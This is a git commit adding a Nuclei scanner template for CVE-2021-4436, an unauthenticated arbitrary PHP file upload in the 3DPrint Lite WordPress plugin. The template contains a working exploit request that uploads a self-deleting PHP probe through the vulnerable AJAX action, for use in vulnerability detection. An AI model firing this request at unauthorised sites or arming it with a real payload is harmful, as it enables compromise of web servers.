Merge pull request #10098 from Kazgangap/cve-2021-4436

add cve-2021-4436
2024-06-25 15:45:27 +08:00 · 2024-06-25 15:45:27 +08:00 · 7f80e30376
parent 0f80bc32ce f19782b84b
commit 7f80e30376
1 changed files with 65 additions and 0 deletions
--- a/http/cves/2021/CVE-2021-4436.yaml
+++ b/http/cves/2021/CVE-2021-4436.yaml
@ -0,0 +1,65 @@
+id: CVE-2021-4436
+
+info:
+  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
+  author: securityforeveryone
+  severity: critical
+  description: |
+    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
+  remediation: Fixed in 1.9.1.5
+  reference:
+    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-4436
+    cwe-id: CWE-434
+    epss-score: 0.00412
+    epss-percentile: 0.73863
+    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wp3dprinting
+    product: 3dprint_lite
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/3dprint-lite/"
+  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
+
+variables:
+  string: "{{randstr}}"
+  filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
+
+        -----------------------------54331109111293931601238262353
+        Content-Disposition: form-data; name="action"
+
+        p3dlite_handle_upload
+        -----------------------------54331109111293931601238262353
+        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
+        Content-Type: text/php
+
+        <?php echo "{{string}}";unlink(__FILE__);?>
+        -----------------------------54331109111293931601238262353--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"jsonrpc":"2.0"'
+          - '"filename":'
+          - '{{filename}}.php'
+        condition: and
+
+      - type: status
+        status:
+          - 200